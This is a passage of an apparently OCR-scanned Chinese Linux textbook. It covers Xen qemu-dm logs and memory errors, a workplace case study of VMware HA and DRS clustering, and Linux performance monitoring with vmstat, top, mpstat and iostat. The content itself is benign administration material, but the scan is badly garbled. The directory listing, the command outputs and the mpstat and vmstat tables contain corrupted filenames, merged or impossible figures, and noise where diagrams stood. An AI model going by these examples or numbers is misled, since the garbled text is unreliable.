事件 将 记录 在 这 里 。 

qemu-dm.[PID].log 是 qemu-dm 进程 为 每 个 完全 虚拟 化 客户 机 创建 的 日 志文 件 。 当 使 用 
日 志文 件 时 ， 你 必须 用 ps 命令 并 挑选 出 qemu-dm 的 信息 来 获取 qemu-dm 的 进程 号 。 注 意 
必须 用 实际 的 qemu-dm 进程 的 PID 来 代替 [PID]。 如 图 8.23 所 示 是 个 实际 的 例子 。 


linux-66ua: /war/log/xen # 1s -1 

总 计 600 

Wr- 1 root root 79464 01-05 07:16 domain-builder-ng.1log 
-rw-r 一 一 1 root root 0 01-01 03:59 hald. log 

rwxr-xr-x 1 root root 1347 01-02 23:14 qemu-dmr-slesll-1.1og 
rwxr-xr-x 1 root root 1315 01-05 07:17 qem-dm-slesll. log 
-rr-xr-x 1 root root 1294 01-05 07:13 gem-dm-slesll. 1o0g.1 
rwxr-xr-x 1 root root 1440 01-02 22:18 qem-dm-slesll.10g.10 
-rwxr-xr-x 1 root root 1397 01-04 23:18 qem-dm-slesll.10g.2 
-wxr-xr-x 1 root root 1416 01-04 23:15 qemu-dm-slesl1.1og.3 
rwxr-xr-x 1 root root 1319 01-04 23:15 qemu-dm-slesl1.1og.4 
rwxr-xr-x 1 root root 1400 01-04 23:04 qemu-dm-slesl1.1og.5 
-war-xr-x 1 root root 1276 01-02 22:53 qem-dm-slesll. 1og.6 
-mar-xr-x 1 root root 1339 01-02 22:50 qemu-dm-slesll.1og.7 
-mar-xr-x 1 root root 1400 01-02 22:19 qem-dm-slesll. log.8 
-mpar-xr-x 1 root root 1419 01-02 22:19 qemu-dm-slesll.1og.9 
rw-r—r— 1 root root 8403 01-05 07:28 xend-debug. log 


wr-r—— 1 root root 306 01-05 07:16 xen-hotplug. log 
图 8.23 ”实例 
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4. 最 常见 的 错误 提示 信息 及 处 理 办 法 
如 果 接 收 到 下 面 的 错误 : 
failed domain creation due to memory shortage, unable to balloon domain0 


若 没有 足够 的 可 用 内 存 ， 域 将 不 能 运行 。Domain0 没有 足够 的 空间 来 容纳 新 创建 的 客户 
机 。 可 以 检查 xend.log 里 关于 这 个 错误 的 内 容 : 


[2010-12-21] 20:33:31 xend 3198] DEBUG (balloon:133) Balloon: 558432 Kib free; 
0 to scrub; need 1048576; retries: 20 
[2010-12-21] 20:33:31 xend. XendDomainInfo 3198] ERROR (XendDomainInfo: 202 
Domain construction failed 


通过 xm list Domain0 命令 ， 可 以 检查 Domain0 所 使 用 的 内 存 数量 。 如 果 Domain0 已 经 没 
有 可 用 内 存 ， 可 以 用 “xm mem-set Domain-0 NewMemSize” 来 设置 新 的 内 存 容量 。 
更 多 关于 Xen 架构 的 信息 ， 请 参考 Xen 白皮书 。 


8.3 VMware HA 在 企业 中 的 应 用 


作为 系统 高 可 用 性 的 一 种 应 用 VMware HA， 在 笔者 单位 的 信息 化 建设 中 扮演 着 重要 的 角 
色 , 笔者 单位 在 采用 了 VMware HA 构建 的 高 可 用 性 集群 后 ， 可 有 效 实现 信息 系统 的 数据 高 可 
用 性 与 实时 备份 ; 充分 利用 系统 原 有 设备 , 不 必 大 量 购置 高 性 能 服务 器 和 交换 机 等 设备 ， 可 以 
降低 构建 高 可 用 系统 的 成 本 。 实 践 证 明 ,该 解决 方案 可 以 确保 信息 系统 服务 的 不 间断 性 ,提高 
整个 信息 系统 的 高 可 用 性 ，HA 消除 了 业务 关键 型 虚拟 机 应 用 程序 部 署 过 程 中 的 单 点 故障 问 
题 ， 同 时 保持 了 其 他 固有 的 虚拟 化 优势 ， 如 更 高 的 系统 利用 率 、IT 资源 与 业务 目标 和 优先 级 
之 间 更 紧密 的 协调 性 , 以 及 更 加 流程 化 、 更 简便 、 更 自动 化 的 大 型 基础 架构 安装 和 系统 的 管理 。 
由 于 笔者 所 在 单位 在 VMware 项 目的 应 用 上 取得 了 较 好 的 成 效 ， 现 将 项 目 实施 的 心得 体验 与 
大 家 分 享 。 


8.3.1 项 目 基 本 情况 


笔者 所 在 单位 的 中 心机 房 自 2004 年 建立 以 来 ， 虽 经 2006 年 、2007 年 的 数 次 改造 ， 但 是 
大 部 分 依然 沿用 旧 设备 。 在 经 过 多 年 的 运行 之 后 , 中 心机 房 现 有 的 大 部 分 服务 器 以 及 作为 服务 
器 使 用 的 兼容 电脑 都 已 经 面临 设备 老化 的 问题 , 不 少 服务 器 基本 处 于 淘汰 的 情况 , 近期 因 服务 
器 死机 导致 的 一 些 部 门 业务 中 断 的 情况 更 是 频繁 发 生 。 

除了 系统 内 部 冲突 之 外 , 还 存在 因 不 合理 调配 服务 器 资源 导致 的 系统 资源 的 极 大 浪费 。 一 
些 轻 量 级 服务 占用 单独 的 服务 器 ， 而 高 密集 运算 的 应 用 ， 却 无 法 利用 闲 余 的 资源 。 壁 如 监控 中 
心 的 服务 器 系统 ， 虽 然 资源 占用 极 低 , 但 是 依旧 占用 了 几 台 服务 器 。 流 程 设计 系统 的 资源 占用 
极 高 ， 但 是 由 于 “一 个 萝卜 一 个 坑 ”， 不 可 能 将 运行 其 他 业务 的 服务 器 共用 。 
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8.3.2 ”VMware 资源 动态 分 配 的 实现 


VMware DRS 可 以 持续 不 断 地 监控 VMware 主机 集群 中 资源 池 的 利用 率 ， 并 能 根据 商业 
需要 在 虚拟 机 中 智能 地 分 配 其 所 需 的 资源 。 一 旦 将 服务 器 整合 到 资源 较 少 的 物理 主机 上 , 虚拟 
机 的 资源 需求 往往 会 成 为 意 想不到 的 瓶颈 ， 全 部 资源 需求 很 有 可 能 超过 主机 的 可 用 资源 。 
VMware DRS 提供 了 一 个 自动 化 机 制 , 通 过 持续 地 平衡 容量 将 虚拟 机 迁移 到 有 更 多 可 用 资源 的 
主机 上 ， 确 保 每 个 虚拟 机 在 任何 节点 都 能 及 时 调用 相应 的 资源 。 


8.3.3 VMware 高 可 用 性 的 实现 


VMware HA 为 所 有 在 虚拟 机 中 运行 的 应 用 程序 提供 易于 使 用 、 经 济 高 效 的 高 可 用 性 ， 当 
服务 器 发 生 故 障 时 ， 受 影响 的 虚拟 机 会 在 集群 中 留 有 备用 容量 的 其 他 主机 上 自动 重启 。HA 将 
停机 时 间 和 服务 中 断 减 至 最 低 ， 同 时 不 需要 专门 的 备用 硬件 和 安装 附加 软件 。VMware HA 为 
整个 虚拟 化 环境 提供 始终 如 一 的 高 可 用 性 , 而 且 对 操作 系统 和 特定 应 用 程序 的 故障 切换 解决 方 
案 成 本 和 复杂 性 没有 限制 。 

其 工作 原理 如 图 8.24 所 示 ， 当 物理 服务 器 C 发 生 故 障 时 ， 心 跳 检测 发 现 服务 器 C 发 生 故 
障 ，C 上 的 资源 会 自动 迁移 到 A 和 B 服务 器 上 ， 以 保持 业务 的 高 可 用 性 。 


集群 系统 
RR RN Eee 
| App | App |[ App ] | | 
1 1 pp 1 1 
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i os | 9s os | 1 
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1 1 1 i 
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i VMware ESX Server 1 VmwareESX Server 1 VmwareESX Server 
人 | 上 
六 -一 -一 -一 -一 -一 -一 一 -一 7 | Pee | -一 -一 一 -一 -一 :一 -一 一 -一 -PP 


A B C 


图 8.24 VMware HA 工作 原理 


8.3.4 高 可 用 性 集群 的 实现 
集群 是 虚拟 基础 架构 管理 中 的 一 个 新 概念 ,使 您 可 以 像 管理 单个 实体 一 样 轻松 地 管理 多 个 


主机 。VMware Infrastructure 3 中 新 增 的 集群 支持 功能 利用 资源 池 和 强大 的 高 可 用 性 将 独立 的 
主机 合并 成 单个 集群 ， 从 而 降低 管理 的 复杂 性 ， 如 图 8.25 所 示 。 


虚拟 化 技术 应 用 案例 第 8 学 


油 资源 
CPU= a+b+c 
内 存 = x+y+Z 


独立 主机 
图 8.25 独立 主机 合并 成 集群 
VMware Infrastructure 的 体系 结构 和 典型 配置 如 图 8.26 所 示 。 


Virtual Infrastructure Client 


,VirtualCente 
server 


Web browser 


图 8.26 VMware 体系 结构 
资源 动态 分 配 和 高 可 用 性 的 实现 为 构建 高 可 用 性 集群 系统 提供 了 有 力 的 保障 ， 采 用 
VMware 构建 企业 高 可 用 性 集群 ， 不 需要 为 系统 中 的 每 台 服 务 器 分 别 添置 备用 服务 器 ， 就 
可 以 有 效 地 降低 系统 成 本 , 在 基于 VMware 的 高 可 用 性 集群 中 , 备用 服务 器 安装 了 VMware 
ESX Server， 与 数据 库 服 务 器 、Web 服务 器 、OA 服务 器 和 文件 服务 器 等 构成 高 可 用 性 集 
群 ， 同 时 采用 数据 库 备份 服务 器 实现 差额 计划 备份 。 
使 用 VMware 提供 的 虚拟 基础 架构 解决 方案 , 服务 器 不 再 需要 随 着 业务 的 增加 而 添加 ， 
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整个 IT 基础 架构 能 得 到 有 效 控制 并 可 充分 发 挥 效 能 。 只 有 当 整 体 资源 出 现 不 足 的 时 候 , 才 
需要 增加 服务 器 。 而 且 对 系统 资源 的 添加 也 非常 简单 ， 不 再 需要 做 繁琐 的 硬件 维护 以 及 业 
务 迁 移 ， 只 需要 简单 地 在 新 服务 器 上 安装 VMware Infrastructure 3 软件 ， 并 添加 到 已 有 的 
VMware Infrastructure 3 架构 中 即 可 ， 新 增资 源 将 自动 分 配 到 各 个 最 需要 的 业务 环境 中 。 

在 HA 和 DRS 功能 的 共同 支撑 下 ， 虚 拟 机 的 稳定 、 不 间断 运行 得 到 了 保证 ， 而 且 ,， 在 
没有 搭建 Cluster 环境 的 情况 下 ,迁移 、 升 级 时 依旧 能 不 中 断 服务 。 哪 怕 是 在 硬件 升级 、 添 
加 、 正 常 停机 维护 等 情况 下 ， 也 能 够 保证 所 有 的 业务 正常 运行 ， 客 户 端 访 问 服务 器 不 产生 
业务 中 断 现象 。 新 的 服务 器 虚拟 化 架构 中 的 另 一 个 重点 是 VMware HA 的 部 署 ， 它 是 整个 
服务 器 系统 安全 、 可 靠 运 行 的 一 道 防线 。 传 统 的 热 备 机 方式 的 最 大 问题 就 是 容易 造成 资源 
的 大 量 闲置 ， 在 正常 运行 状态 下 ， 所 有 备 机 服务 器 都 处 于 闲置 状态 ， 不 仅 造成 计算 资源 的 
空 耗 ， 而 且 还 浪费 大 量 的 电力 和 散热 资源 ， 投 资 回 报 率 非常 低 。 
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9.1 Linux 性 能 评估 


当 我 们 搭建 好 系统 后 ， 由 于 硬件 、 软 件 或 是 网 络 环境 等 问题 都 会 对 应 用 产生 影响 。 作 为 系 
统 工 程 师 ， 就 是 要 适应 各 种 环境 因素 的 变化 , 来 优化 应 用 系统 可 能 出 现 的 各 种 异常 情况 ,如 何 
定位 故障 ， 如 何 优化 系统 ， 这 些 都 是 比较 难 解决 的 问题 ， 下 面 即 将 讨论 的 就 是 由 于 系统 软件 、 
硬件 配置 不 当 造成 的 各 种 问题 。 

系统 优化 是 一 项 复杂 、 繁 琐 的 工作 ， 优 化 前 需要 监测 、 采 集 、 测 试 、 评 估 ， 优 化 后 也 需要 
测试 、 采 集 、 评 估 ， 是 一 个 长 期 和 持续 的 过 程 。 不 同 的 系统 、 不 同 的 硬件 、 不 同 的 应 用 优化 的 
重点 不 同 、 优 化 的 方法 不 同 、 优 化 的 参数 也 不 同 。 性 能 监测 是 系统 优化 过 程 中 的 重要 一 环 ， 如 
果 没 有 监测 、 不 清楚 性 能 瓶颈 在 哪里 ， 怎 么 优化 呢 ? 所 以 找到 性 能 瓶颈 是 性 能 监测 的 目的 ， 也 
是 系统 优化 的 关键 。 系 统 由 若干 子 系统 构成 , 通常 修改 一 个 子 系统 有 可 能 影响 到 另外 一 个 子 系 
统 ， 甚 至 会 导致 整个 系统 不 稳定 、 衣 省 。 同 样 解决 一 个 性 能 瓶颈 ， 往 往 又 会 出 现 另外 的 瓶颈 或 
者 其 他 问题 , 所 以 性 能 优化 更 加 切实 的 目标 , 是 做 到 在 一 定 范围 内 使 系统 的 各 项 资源 使 用 趋向 
合理 和 保持 一 定 的 平衡 。 系统 运行 良好 的 时 候 恰恰 也 是 各 项 资源 达到 了 一 个 平衡 体 , 任何 一 项 
资源 的 过 度 使 用 都 会 造成 平衡 体系 的 破坏 ， 从 而 造成 系统 负载 极 高 或 者 响应 迟缓 ， 如 CPU 过 
度 使 用 会 造成 大 量 进程 等 待 CPU 资源 、 系 统 响应 变 慢 等 。 等 待 会 造成 进程 数 增加 ， 进 程 增 加 

会 造成 内 存 使 用 增加 ， 内 存 耗 尽 又 会 造成 虚拟 内 存 使 用 ， 使 用 虚拟 内 存 又 会 造成 磁盘 IO 增 
加 和 CPU 开销 增加 (用 于 进程 切换 、 缺 页 处 理 的 CPU 开销 ) ， 所 以 说 优化 、 监 测 、 测 试 通常 
是 连 在 一 起 的 ， 而 且 是 一 个 循环 而 且 长 期 的 过 程 ， 通 常 监测 的 子 系统 有 以 下 这 些 ; 

@ CPU 

© Memory 

@ LIO 

® Network 

这 些 子 系统 互相 依赖 , 了 解 这 些 子 系统 的 特性 , 监测 这 些 子 系统 的 性 能 参数 以 及 及 时 发 现 
可 能 会 出 现 的 瓶颈 对 系统 优化 很 有 帮助 。 

下 面 我 们 就 来 看 一 下 监测 工具 的 使 用 。 

我 们 只 需要 简单 的 工具 就 可 以 对 Linux 的 性 能 进行 监测 ， 是 常用 的 工具 如 表 9.1 所 示 。 
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表 9.1 常用 监测 工具 


工具 简单 介绍 
top 查看 进程 活动 状态 以 及 一 些 系统 状况 
vmstat 查看 系统 状态 、 硬 件 和 系统 信息 等 
iostat 查看 CPU 负载 、 硬 盘 状况 
Sar 综合 工具 ， 查 看 系统 状况 
mpstat 查看 多 处 理 器 状况 
netstat 查看 网 络 状况 
iptraf 实时 网 络 状况 监测 
tcpdump 抓 取 网 络 数据 包 ， 详 细 分 析 
mpstat 查看 多 处 理 器 状况 
tcptrace 数据 包 分 析 工具 
netperf 网 络 带宽 工具 
dstat 综合 工具 ， 综 合 了 vmstat、iostat、ifstat、netstat 等 多 个 信息 
不 同 的 系统 ， 其 用 途 也 不 同 ， 要 找到 性 能 瓶颈 需要 知道 系统 有 什么 应 用 、 有 什么 特点 ， 如 
站 服务 器 对 系统 的 要 求 肯定 和 文件 服务 器 不 一 样 , 所 以 分 清 不 同系 统 的 应 用 类 型 很 重要 , 通 


常 应 用 可 以 分 为 两 种 类 型 : 


@ IO 相关 , IO 相关 的 应 用 通常 用 来 处 理 大 量 数 据 , 需要 大 量 内 存 和 存储 , 频繁 IO 操 
作 读 写 数据 ， 而 对 CPU 的 要 求 则 较 少 ， 大 部 分 时 候 CPU 都 在 等 待 硬盘 ， 如 数据 库 
服务 器 、 文 件 服务 器 等 。 

@ CPU 相关 ，CPU 相关 的 应 用 需要 使 用 大 量 CPU， 如 高 并 发 的 Web/Mail 服务 器 、 图 
像 处 理 (Maya、Softimages 等 软件 )、 科 学 计算 等 都 可 被 视 作 CPU 相关 的 应 用 。 


看 看 实际 中 的 例子 ， 文 件 服务 器 复制 一 个 大 文件 时 表现 如 下 : 


#vmstat 1 

PEOGS 二 = 一 一 一 一 一 = 一 一 和 二 二 三 二 二 = 三 寺 三 二 ===BD== = = --system--— 
ES ep 

> swpd free buff cache si so bi bo in cs us sy id wa 
st 

0 4 140 1962724 335516 4852308 0 0 388 65024 1442 563 0 2 47 52 0 

0 4 140 1961816 335516 4853868 0 0 768 65536 1434 522 0 5048 0 

0 4 140 1960788 335516 4855300 0 0 768 48640 1412 573 0 1 50 49 0 

0 4 140 1958528 335516 4857280 0 0 1024 65536 1415 521 0 14157 0 

0 3 140 1957488 335516 4858884 0 0 768 81412 1504 609 0 25049 0 


CPU 做 大 量 计算 时 表现 如 下 : 


# vmstat 1 
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EEOCS” 三 二 一 一 一 一 P= ==BWaD-= = LO --system-—— 
Pe Epo 

rb swpd free buff cache 5i “30 bi bo dn Cg us sy id wa 
st 

4 0 140 3625096 334256 3266584 0 0 0 16 1054 470 1000 0 0 0 

4 0 140 3625220 334264 3266576 0 0 0 12 1037 448 1000 0 0 0 

4 0 140 3624468 334264 3266580 0 0 0 148 1160 632 1000 0 0 0 

4 0 140 3624468 334264 3266580 0 0 0 0 1078 527 1000 0 0 0 

4 0 140 3624712 334264 3266580 0 0 0 80 1053 501 1000 0 0 0 


上 面 两 个 例子 最 明显 的 差别 就 是 id 一 栏 ， 代 表 CPU 的 空闲 率 ， 复 制 文件 时 id 维持 在 
50% 左 右 ，CPU 大 量 计 算 的 时 候 id 基本 为 0。 


我 们 如 何 知 道 系统 性 能 是 好 还 是 差 呢 ? 这 需要 事先 建立 一 个 底线 ,如 果 性 能 监测 得 到 的 统 
计数 据 跨 过 这 条 线 ， 我 们 就 可 以 说 这 个 系统 性 能 差 ， 如 果 数 据 能 保持 在 线 内 我 们 就 说 性 能 好 。 
建立 这 样 的 底线 需要 额外 的 负载 测试 以 及 系统 管理 员 丰 富 的 经 验 。 

通常 ， 我 们 期 望 系统 能 到 达 以 下 目标 。 


@ CPU 利用 率 : 如 果 CPU 有 100% 利 用 率 , 那么 应 该 达到 这 样 一 个 平衡 : 65%~70% User 
Time, 30%~35% System Time, 0%~5% Idle Time。 

@ 上 下 文 切换 : 上 下 文 切 换 应 该 和 CPU 利用 率 联系 起 来 ， 如 果 能 保持 上 面 的 CPU 利 
用 率 平衡 ， 大 量 的 上 下 文 切换 是 可 以 接受 的 。 

@ 可 运行 队列 : 每 个 可 运行 队列 不 应 该 有 超过 1~3 个 线程 (每 个 处 理 器 )， 如 双 处 理 器 
系统 的 可 运行 队列 里 不 应 该 超过 6 个 线程 。 


1. vmstat 


vmstat 是 一 个 查看 系统 整体 性 能 的 小 工具 ， 即 使 在 很 重 的 情况 下 也 能 运行 恨 好， 并且 可 
以 用 时 间 间 隔 采集 到 连续 的 性 能 数据 ， 例 如 : 


# vmstat 1 

DIOCH 2 OT FD 工 二 一 二 地 直 Es --system-— 
i ED 

i swpd free buff cache si so bi bo in cs us sy id wa 


st 
76456 7708 1092 193356 
76456 6468 1008 194040 
916 194296 
76456 6388 1012 193880 
76456 4932 1176 195056 


0 3 pe 
0 54412 1476 1554 1993 23 13 0 64 
0 25012 29056 1330 930 14 9 077 
0 19768 20624 1286 823 14 9 0 77 
0 13004 16556 1234 806 13 8 0 79 
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参数 介绍 如 下 。 


@ rf: 可 运行 队列 的 线程 数 ， 这 些 线程 都 是 可 运行 状态 ， 只 不 过 CPU 暂时 不 可 用 。 

@ b: 被 blocked 的 进程 数 ， 正 在 等 待 IO 请 求 。 

@ in: 被 处 理 过 的 中 断 数 。 

@ cs: 系统 上 正在 做 上 下 文 切换 的 数目 。 

@ us: 用 户 占用 CPU 的 百分比 。 

@ sy: 内 核 和 中 断 占 用 CPU 的 百分比 。 

@ wa: 所 有 可 运行 的 线程 被 blocked 以 后 都 在 等 待 JO， 这 时 候 CPU 空闲 的 百分比 。 
@ id: CPU 完全 空闲 的 百分比 。 


下 面 列举 两 个 实例 来 分 析 一 下 ， 先 来 看 一 下 实例 1: 


# vmstat 1 

as 和 = I --system-- 
下 Epa 

于 上 各 swpd free buff cache si so bi bo 1 Cs ers id wa 


st 
140 2915476 341288 3951700 
140 2915724 341296 3951700 
2915848 341296 3951700 
140 2915848 341296 3951700 
140 2915848 341296 3951700 


从 上 面 的 数据 可 以 看 出 以 下 几 点 : 


(1) interrupts (in) 非常 高 ， 上 下 文 切 换 (context switch，cs) 比较 低 ， 说明 这 个 CPU 一 
直 在 请 求 资源 。 

(2) user time (us) 一 直 保 持 在 80% 以 上 ，, 而且 上 下 文 切换 (cs) 较 低 ， 说 明 某 个 进程 
可 能 一 直 占 用 CPU。 

(3) run queue (r) 刚好 是 4 个 。 


0 1057 523 19 81 
0 1048 546 19 81 
82 
24 1044 564 20 80 
0 1060 546 18 82 


心心 心心 心 
So oo 
- 

心 
o 
oo oo oo 
oo 
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上 
es 
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区 
心 
一 
加 
=- 
一 一 
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接 下 来 看 看 实例 2: 

# vmstat 1 

和 二 观 公 表 局 正业 三 三 三 二 三 三 一 三 三 ===uWap== 三 三 三 = === --system--— 
三 站 FE 三 

eB swpd free buff cache si so bi bo in cs us sy id wa 
st 

14 0 140 2904316 341912 3952308 0 0 0 460 1106 9593 36 64 1 0 0 

7 人 140 2903492 341912 3951780 0 0 0 0 1037 9614 35 65 1 0 0 

20 0 140 2902016 341912 3952000 0 0 0 0 1046 9739 35 64 1 0 0 

by 140 2903904 341912 3951888 0 0 0 76 1044 9879 37 63 0 0 0 
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16 0 140 2904580 341912 3952108 0 0 0 010559808 3465 1 0 0 
从 上 面 的 数据 可 以 看 出 以 下 几 点 : 


@ context switch (cs) 比 interrupts (in) 高 得 多 ， 说 明 内 核 不 得 不 来 回 切换 进程 。 

@ 进一步 观察 发 现 : System Time (sy ) 很 高 而 User Time (us ) 很 低 ， 加 上 高 频率 的 上 下 
文 切换 (cs )， 说 明正 在 运行 的 应 用 程序 进行 了 大 量 的 系统 调用 ( System Call )。 

@ run queue (T) 在 14 个 线程 以 上 ， 按 照 这 个 测试 机 器 的 硬件 配置 (四 核 )， 应 该 保持 在 
12 个 以 内 。 


2.top 


top 命令 对 于 所 有 正在 运行 的 进程 和 系统 载荷 提供 不 断 更 新 的 概念 信息 ， 包 括 CPU 负荷 、 
内 存 使 用 以 及 每 个 进程 的 内 存 使 用 情况 。 注 意 top 也 提供 了 负荷 平均 值 的 快照 ， 这 非常 类 似 于 
uptime(1) 的 做 法 ; 然而 ，top 也 提供 了 关于 已 被 创建 但 当前 正在 休眠 的 进程 数量 以 及 正在 运行 
的 进程 数量 的 分 类 汇总 信息 。“ 休 眠 ”任务 是 那些 处 于 被 阻塞 并 等 待 某 项 活动 的 任务 ， 例 如 用 
户 对 键盘 的 一 次 按键 、 来 自 管道 或 socket 的 数据 、 来 自 另 一 台 主 机 《〈 例 如， 等 待 别人 发 出 内 
容 请 求 的 Web 服务 器 ) 的 请 求 等 。top(1) 还 单独 显示 了 每 个 处 理 器 的 负荷 平均 值 ， 这 有 助 于 识 
别 在 调度 任务 过 程 中 的 任何 不 均衡 性 .默认 状 态 下 ,top 的 输出 被 经 常 刷新 , 且 把 任务 基于 CPU 
占用 时 间 的 百分比 排序 。 当 然 也 可 能 存在 着 其 他 排序 选项 ， 例 如 CPU 累加 消耗 量 或 者 内 存 消 
耗 百分比 等 ， 例 如 ; 

Eop = 06:55209 up ‘938r 3 Usersy load average: ll2r Lu25r 2515 


Tasks: 108 total, 2 running, 106 sleeping, 0 stopped, 0 zombie 
Cpu(s): 0.3%Usr 0.0%sy, O00%nir 99.7%1idy 0.0%wa, 0.0%hi, 0 0%elis 


0.0%st 
Mem: 763992k total, 408276k used, 355716k free, 19148k buffers 
Swap: 1148608k total, 76k used, 1148532k free, 99736k cached 
PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND 

4479 root 20 0 "LT43m 571m T6008 0 “TT 站 2 54 

5548 root 20 0 379m 24m 1l4m R 0.7 3.2 0:04.98 gnome-terminal 
0 20 0 1064 416 348 S 0.0 0.1 0:01.24 init 
2 root i 0 0 0S 0.0 0.0 0:00.00 kthreadd 
3 root RE 0 0 0S 0.0 0.0 0:00.00 migration/0 
4 root Eg 0 0 0S 0.0 0.0 0:00.04 ksoftirqd/0 
5 Foot 7 0 0 0S 0.0 0.0 0:00.98 events/0 
6 root 1 0 0 0S 0.0 0.0 0:00.00 khelper 
Eee T5 =5 0 0 0S 0.0 0.0 0:00.00 kintegrityd/0 
8 root 15' =5 0 0 0S 0.0 0.0 0:00.84 kblockd/0 
SS roolk 15 =5 0 0 0.S 0-0 0.0 0:00.00 kacpid 
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10 root LB = 0 0 03 00 0 0:00.00 kacpi notify 
1 roo 5 0 0 Qs OGA 0:00.00 cqueue 
IOS 3 0 0 0 .5 "00 “0-0 0:00.00 kseriod 
13 root 15 -5 0 0 0S 0.0 0.0 0:00.00 kondemand/0 
14 root 0 0 0 0S 0.0 0.0 0:03.52 pdflush 
15 IOOt 20 0 0 0 0 Ss 00 0.0 0:07.38 pdflush 
16 root LS 0 0 0 3 0 0 O00 0:00.44 kswapd0 
17 root L535 0 0 0S 0.0 0.0 0:00.00 aio/0 
18 root et 0 0 Ors omneso 0:00.00 kpsmoused 
top 的 输出 结果 中 包括 以 下 信息 。 
@ 第 1 行 显示 系统 的 正常 运行 时 间 ， 包 括 当前 时 间 、 系 统 自 从 上 次 重启 后 已 运行 的 时 间 


长 度 、 当 前 用 户 数量 ， 以 及 3 个 用 于 表示 先前 的 1min、5min 和 15min 内 准备 运行 的 
平均 处 理 器 数目 的 平均 负荷 值 。 

@ 第 2 行 给 出 进程 的 统计 信息 ， 包 括 在 top 输出 结果 的 上 次 更 新 之 际 正在 运行 的 进程 总 
数 。 这 一 行 还 显示 睡眠 中 的 进程 、 运 行 中 的 进程 、 僵 尸 进程 以 及 已 停止 进程 的 数目 。 

@ 第 3 行 和 第 4 行 显示 各 个 CPU 的 统计 信息 ， 包 括 用 户 进程 、 系 统 进程 、Niced 进程 以 
及 空闲 进程 所 占用 的 CPU 时 间 百 分 比 。 

@ 第 5 行 提供 了 内 存 统计 信息 ， 包 括 内存 总 量 、 已 用 内 存量 、 空 闲 内 存量 、 不 同 进程 共 
享 的 内 存量 ， 以 及 用 作 缓 冲 区 的 内 存量 。 

@ 第 6 行 显示 了 虚 存 或 交换 活动 的 统计 信息 ， 包 括 交 换 空 间 总 量 、 已 用 的 交换 空间 大 小 、 
空闲 的 交换 空间 大 小 以 及 缓存 的 交换 空间 大 小 。 


其 余 各 行 显示 了 具体 进程 的 统计 信息 。 对 一 些 top 参数 的 说 明 如 下 所 示 。 


d: 输出 数据 的 更 新 延迟 。 

p: 只 显示 指定 进程 的 信息 ， 最 多 可 指定 20 个 进程 。 

S: 显示 进程 及 其 子 进程 所 占用 时 间 的 汇总 信息 ， 还 给 出 进程 的 停工 时 间 。 
I: 不 报告 空闲 进程 的 信息 。 

H: 显示 进程 的 所 有 线程 信息 。 

N: 生成 报告 的 次 数 。 


top 还 提供 了 一 种 动态 模式 ， 用 于 修改 所 报告 的 信息 。 按 下 下 键 可 以 激活 动态 模式 。 再 按 
下 J 了 键 ， 就 可 以 添加 一 个 新 列 来 显示 某 个 当前 执行 的 进程 最 近 使 用 的 CPU 时 间 。 这 种 额外 信 
息 对 于 理解 SMP 系统 中 的 进程 特别 有 用 。 


3. mpstat 


mpstat 是 Multiprocessor Statistics 的 缩写 ， 是 实时 系统 监控 工具 , 用 于 报告 与 CPU 相关 的 
一 些 统计 信息 ， 这 些 信 息 存放 在 /proc/stat 文件 中 。 在 多 CPU 系统 中 ， 其 不 但 能 查看 所 有 CPU 
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的 平均 状况 信息 ， 而 且 能 够 查看 特定 CPU 的 信息 ， 例 如 : 


#mpstat -P ALL 2 10 

Linux 2.6.18-53.el5PAE (localhost.localdomain) 03/28/2009 

10:07:57 PM CPU %user Snice %sys Siowait Sirq %soft %steal $idle intr/s 
T00759 PM al 20.75 0-00 10-502 .9500 025 .05.25 0.00 '66% 15" T29450 
10:07:59 "PM 0 16.00 0:00 '9=00, 1-50 .0.00 .0,00 0.00 73550 1000.50 
10:07559 PM 3 22516 000 12512 "152 0000 0s5100s00 /6010 294s00 


4. iostat 


iostat 命令 是 另 一 个 研究 磁盘 吞吐 量 的 工具 。 和 sar 类 似 , iostat 可 以 使 用 间隔 和 计数 参数 。 
第 一 个 间隔 的 输出 包含 Linux 总 运行 时 间 的 指标 。 与 其 他 性 能 命令 比较 ， 这 可 能 是 iostat 最 独 
特 的 功能 ， 例 如 : 


#iostat -x 1 

Linux 2.6.18 (laptop) _i686_ (2 CPU) 

avg-cpu: %user  $%nice %system $%iowait %steal Sidle 

Eh 0.50 8.96 48.26 0.00 36.82 

Device: rrqm/s wrqm/s Ir/s Ww/s rsec/s wsec/s avgrq-sz avgqu-sz await 
svctm %util 

sda 6.00 273.00 99.00 7.00 2240.00 2240.00 42.26 1.12 10.57 7.96 
84.40 

sdb 0.00 4.00 0.00 350.00 0.00 2068.00 5.91 0.55 “1:58 0.54 
18.80 


对 上 述 代 码 中 的 重要 参数 ， 说 明 如 下 。 


@ rrqm/s: 每 秒 进行 merge 的 读 操作 数目 ， 即 delta(rmerge)/s。 

@ wrqm/s: 每 秒 进行 merge 的 写 操作 数目 ， 即 delta(wmerge)/s。 

@ Is: 每 秒 完成 的 读 IO 设备 次 数 ， 即 delta(rio)/s。 

@ w/s: 每 秒 完 成 的 写 IO 设备 次 数 ， 即 delta(wio)/s。 

@ Isec/s: 每 秒 读 扇 区 数 ， 即 delta(rsect)/s。 

@ wsec/s: 每 秒 写 遍 区 数 ， 即 delta(wsect)/s。 

@ avgrq-sz : 平均 每 次 设备 IO 操作 的 数据 大 小 ( 扁 区)， 即 
delta(rsectt+wsect)/delta(riot+Ww1i0)。 

avgqu-sz: 平均 IO 队列 长 度 ， 即 delta(aveq)/s/1000 ( 因为 aveq 的 单位 为 ms )。 

avwait: 平均 每 次 设备 IO 操作 的 等 待 时 间 (ms )， 即 delta(ruse+wuse)j/delta(rio+wio)。 
svctm: 平均 每 次 设备 IJO 操作 的 服务 时 间 (ms )， 即 delta(use)/delta(riot+wio)。 

%util: 一 秒 中 有 百 分 之 多 少 的 时 间 用 于 1O 操作 , 或 者 说 一 秒 中 有 多 少时 间 IO 队列 
是 非 空 的 ， 即 delta(use)/s/1000 ( 因为 use 的 单位 为 ms )。 


如 果 %util 接近 100%， 说 明 产 生 的 IO 请 求 太 多 ，1O 系统 已 经 满 负 荷 ， 该 磁盘 可 能 存在 瓶 


Linux ”企业 应 用 案例 精 解 


颈 。idle 小 于 70% 时 ,LO 压力 就 较 大 了 。 一般 读 取 速度 有 较 多 的 wait， 同 时 可 以 结合 vmstat 查看 
b 参数 (等待 资源 的 进程 数 ) 和 wa 参数 (IO 等 待 所 占用 的 CPU 时 间 的 百分比 , 高 于 30% 时 , VO 
压力 较 大 ) 。 

